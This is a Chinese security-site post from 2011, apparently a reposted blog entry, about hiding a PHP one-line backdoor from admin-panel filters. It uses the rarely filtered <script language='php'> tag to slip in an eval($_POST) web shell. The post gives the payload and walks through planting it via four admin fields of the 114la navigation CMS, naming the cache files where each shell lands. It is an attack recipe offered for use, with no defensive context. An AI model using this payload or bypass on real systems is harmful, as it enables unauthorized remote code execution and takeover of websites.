服务器 > 网络安全 > 脚本攻防

php后台插一句话后门的思路分享

64人参与 2011-09-29 脚本攻防

首先介绍下php的各种标签:
1):
<?php ?>
demo:
<?php echo "test";?>
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
2):
<? echo "test"; ?>
这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,
大多程序员都是很熟悉的!我们把这种标签称为短语标签!
3):
<script language="php"> </script>
demo:
<script language="php">echo "test";</script>
这个标签是今天的重点,大多都不熟悉的!而且程序员在网站后台过滤插一句话
的时候往往都是以
“<?,?>”
这两个关键字进行替换或过滤的!所以这种标签在后台插马
的时候用处还是很大的!ps:就是应为使用量不大,就不重视!这样能行吗?
实战:114啦导航准备我们的一句话代码:利用script的标签代码:
<script language="php">eval ($_post[1]);</script>
首先后台我跟晴天那家伙已经看完了。他自己的方法也没拿下shell模版目录权限是只读!你们懂的!
这里的方法就是利用缓存拿shell.这个方法是以前公布出来的。作者具体就不知道是谁了(转载乱了)
–官方以及把这里修补了,但是修补方法很马虎!就是我之前说的过滤关键字只有
<? ?>
所以这里我们可以利用 我们准备好的script格式的php一句话代码插入!
名站首行:
html内输入一句话,提交后一句话木马位于admin/data/cache/cache_mztop.php
名站轮播:
站点网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_loop.php
名站切换:
ifreme网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_famous_tab.php
首页实用工具:
工具网址后输入一句话,提交后一句话木马位于admin/data/cache/cache_index_tool.php
本文来源于:半坑土农民's blog
(0)

您想发表意见!!点此发布评论

推荐阅读

利用ntfs流隐藏你的一句话木马的方法

09-29

dedecms官方模板包含一句话后门木马

09-29

php disable_functions 函数列表

09-29

MYSQL_OUTPUT 脱裤(脱库)通用脚本(修正版)

09-28

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具第二版

09-30

aspcms企业建站系统0day漏洞介绍

09-26

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论